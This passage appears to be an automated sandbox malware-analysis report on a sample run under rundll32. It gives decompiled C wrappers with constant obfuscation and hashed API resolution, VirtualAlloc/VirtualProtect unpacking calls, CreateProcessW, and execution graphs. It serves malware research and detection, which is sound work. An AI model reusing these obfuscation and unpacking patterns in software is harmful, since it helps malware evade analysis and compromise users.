                                                                      control_flow_graph 88 1beb40-1beb93 VirtualProtect 89 1beba6-1bec17 88->89 90 1beb95-1beba1 88->90 91 1bec3a-1bec85 call 1be7a0 call 1be7e0 89->91 107 1bec19-1bec37 89->107 90->91 99 1bec90-1bec9a 91->99 100 1becf8-1bed4a call 1be920 99->100 101 1bec9c-1beca3 99->101 111 1bed78-1bed7f 100->111 112 1bed4c-1bed50 100->112 104 1beced-1becf6 101->104 105 1beca5-1becac 101->105 104->99 105->104 106 1becae-1becea call 1be7e0 105->106 106->104 107->91 116 1bed8a-1bed94 111->116 112->111 115 1bed52-1bed75 call 1be880 112->115 115->111 118 1bede6-1bee1b call 1bf000 116->118 119 1bed96-1bed9d 116->119 122 1beddb-1bede4 119->122 123 1bed9f-1beda6 119->123 122->116 123->122 124 1beda8-1bedd9 call 1bee20 VirtualProtect 123->124 124->122
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001BEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001BEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: d4ec2c4b8d7ca32284ee0ef8aadd8eaa76017fb165e723c9a8639b3d5767411f
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 61C18875A002099FCB48CF98C590EEEB7B6BF88314F148159E9199B355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 461a14-461a5a call 461ac8 135 461a70-461aa7 DdeCreateStringHandleA DdeNameService 129->135 136 461a5c-461a69 129->136 139 461aaf 135->139 136->135
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 140 407f4b-407ffd call 412550 call 407378 lstrcmpiW
                                                                      C-Code - Quality: 80%
                                                                      			E00407F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00407378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x00407f52
                                                                      0x00407f55
                                                                      0x00407f57
                                                                      0x00407f5a
                                                                      0x00407f5e
                                                                      0x00407f5f
                                                                      0x00407f64
                                                                      0x00407f6b
                                                                      0x00407f72
                                                                      0x00407f79
                                                                      0x00407f94
                                                                      0x00407f97
                                                                      0x00407f9e
                                                                      0x00407fa5
                                                                      0x00407fac
                                                                      0x00407fb3
                                                                      0x00407fba
                                                                      0x00407fbe
                                                                      0x00407fc5
                                                                      0x00407fcc
                                                                      0x00407fd3
                                                                      0x00407fd7
                                                                      0x00407feb
                                                                      0x00407ff7
                                                                      0x00407ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00407FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: d902e23f6411a0c44fb82a2e6a8296566946c79d4f08726a750a0587d667c915
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: EC110FB6C00219BBDF00DFA4C94A8DEBFB4EF04318F108589E92466241D3B95B14DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001BE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 1be620-1be66b call 1bea10 148 1be67a-1be6aa call 1be390 VirtualAlloc 145->148 149 1be66d-1be677 call 1bea10 145->149 149->148
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001BE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: c244dc4ca5502cf1a60d3aeeee32a4874eb2545764dc38a8e80cb46f571af093
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 6A110060D08289DAEF01D7E894097FEBFB55B21704F044098D5457B282D7BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 170 41b86e-41b949 call 412550 call 407378 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E0041B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00412550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00407378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}











                                                                      0x0041b876
                                                                      0x0041b87b
                                                                      0x0041b87d
                                                                      0x0041b87e
                                                                      0x0041b881
                                                                      0x0041b884
                                                                      0x0041b887
                                                                      0x0041b88a
                                                                      0x0041b88d
                                                                      0x0041b890
                                                                      0x0041b891
                                                                      0x0041b892
                                                                      0x0041b893
                                                                      0x0041b896
                                                                      0x0041b897
                                                                      0x0041b89a
                                                                      0x0041b89d
                                                                      0x0041b8a0
                                                                      0x0041b8a4
                                                                      0x0041b8a5
                                                                      0x0041b8aa
                                                                      0x0041b8bb
                                                                      0x0041b8c3
                                                                      0x0041b8c6
                                                                      0x0041b8ca
                                                                      0x0041b8d1
                                                                      0x0041b8d8
                                                                      0x0041b8df
                                                                      0x0041b8e6
                                                                      0x0041b8ed
                                                                      0x0041b8f1
                                                                      0x0041b8f4
                                                                      0x0041b8fb
                                                                      0x0041b902
                                                                      0x0041b909
                                                                      0x0041b928
                                                                      0x0041b942
                                                                      0x0041b949

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0041B942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 356f3b95ddaaa167dd82075bba60e0d4b8753b8399a247414e87281e072a6ffd
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 1121E672800248BBDF159F95CD09CDFBF79FF89714F008158FA1466160D7B69A60DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040471A, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 175 40471a-4047ea call 412550 call 407378 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E0040471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00412550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00407378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}












                                                                      0x0040473b
                                                                      0x00404740
                                                                      0x0040474a
                                                                      0x00404753
                                                                      0x0040475a
                                                                      0x00404761
                                                                      0x00404765
                                                                      0x0040476f
                                                                      0x00404772
                                                                      0x00404775
                                                                      0x0040477c
                                                                      0x00404788
                                                                      0x00404789
                                                                      0x0040478e
                                                                      0x00404792
                                                                      0x00404799
                                                                      0x004047aa
                                                                      0x004047ad
                                                                      0x004047b4
                                                                      0x004047d3
                                                                      0x004047e4
                                                                      0x004047ea

                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004047E4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 65912959230b40fcbc033ffb5be77358307eff91cf09a66e6c6d15bb7c7ea9d8
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 27210372D01208FBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00428330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004285AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004284D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00428170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00462B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00461428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004280E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: rundll32.exe PID: 2428 Parent PID: 2468 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:4.5%
                                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:268
                                                                      Total number of Limit Nodes:16

                                                                      Graph

                                                                      execution_graph 31067 21f090 31068 21f0b5 31067->31068 31073 21e620 31068->31073 31070 21f1bf 31076 21eb40 VirtualProtect 31070->31076 31072 21f1f8 31074 21e661 31073->31074 31075 21e694 VirtualAlloc 31074->31075 31075->31070 31078 21eb95 31076->31078 31077 21ede6 31077->31072 31078->31077 31079 21edb8 VirtualProtect 31078->31079 31079->31078 31080 463928 31081 463972 31080->31081 31082 4639bd GetEnhMetaFileA 31081->31082 31083 4639cc VirtualAlloc 31082->31083 31085 463acf 31083->31085 31086 461638 31087 461643 DdeInitializeA 31086->31087 31089 461695 31087->31089 31092 461a14 31089->31092 31097 461ac8 31092->31097 31096 4616d6 31098 461ad2 31097->31098 31099 461a34 DdeCreateStringHandleA DdeNameService 31097->31099 31100 461ae0 DdeFreeStringHandle 31098->31100 31099->31096 31100->31099 31101 4043df 31106 415250 31101->31106 31103 404457 31142 4104c7 31103->31142 31105 404467 31141 4161a4 31106->31141 31108 41696d 31243 40c364 6 API calls 31108->31243 31111 416991 31244 41d02d GetPEB SHGetFolderPathW RtlAllocateHeap CloseHandle CreateProcessW 31111->31244 31113 41696b 31113->31103 31117 40de81 GetPEB 31117->31141 31140 40df8a GetPEB 31140->31141 31141->31108 31141->31111 31141->31113 31141->31117 31141->31140 31145 40ea16 31141->31145 31149 401806 31141->31149 31163 40a821 31141->31163 31172 404d90 31141->31172 31183 405f04 31141->31183 31191 40d2dd 31141->31191 31201 41434e 31141->31201 31210 404844 31141->31210 31221 414f04 GetPEB 31141->31221 31222 403faf GetPEB 31141->31222 31223 410e6b GetPEB RtlAllocateHeap 31141->31223 31224 40a2d2 GetPEB RtlAllocateHeap 31141->31224 31225 40e612 GetPEB 31141->31225 31226 411dfe GetPEB 31141->31226 31227 414c37 GetPEB RtlAllocateHeap 31141->31227 31228 4037a2 GetPEB 31141->31228 31229 41a966 GetPEB RtlAllocateHeap 31141->31229 31230 414a9e GetPEB RtlAllocateHeap 31141->31230 31231 410d6d 31141->31231 31235 409106 GetPEB RtlAllocateHeap 31141->31235 31236 